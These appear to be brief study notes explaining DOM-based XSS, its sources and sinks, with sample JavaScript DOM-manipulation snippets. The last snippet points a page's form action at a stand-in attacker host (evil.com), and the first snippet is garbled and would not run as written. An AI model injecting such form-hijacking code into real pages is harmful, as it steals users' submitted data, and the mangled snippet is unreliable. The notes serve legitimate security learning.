Skip to content

DOM-based XSS

links: WS TOC - Cross Site Scripting (XSS) - Index


  • Document Object Model (DOM) is a tree-like representation of the content of a webpage which can be manipulated by javascript (Example)
  • No server interaction, malicious payload can be triggered by a script already on the page which takes user input and improperly processes it, leading to script execution
  • Example
    • Website has javascript which prints the URL of the current page using 'document.write()'
    • If an attacker can manipulate the URL and add a script to it, that script will be executed when the page loads
  • Main point
    • This type of XSS relies on the client-side environment to execute malicious scripts without communication with the server
    • Bad because the server doesn't get a chance to sanitize the input
    • Sanitization therefore has to happen on the client side as well
  • Sources: Where user input comes from
    • document.URL, location.href, location.search
  • Sink: Where the user input goes to
    • document.write(), innerHTML, element.src (dynamically adding / changing content on the page)
// Create a new node and insert it in the tree
var newli = document . createElement ( " l i " ) ; var newtxtli = document . createTextNode ( " Four " ) ; newli . appendChild ( newtxtli ) ; document . getElementById ( " menu−l i s t " ) . appendChild ( newli ) ;

// Delete a node
firstchild = document.getElementById( "menu−list" )
    .firstChild;
document.getElementById("menu−list")
    .removeChild(firstchild);

// Modify a node
document.getElementById("addbutton")
    .onclick=otherFunction;

// Change the title of a page
var title = document.getElementById("title");
title.innerHTML = "<h1>New Title</h1>";

// Remove the error messages
var node = document.getElementById("error_list");
while (node.firstChild) {
    node.removeChild(node.firstChild);
}

// Change the destination of a formular
document.getElementById("form")
    .action="https://www.evil.com/dest";

links: WS TOC - Cross Site Scripting (XSS) - Index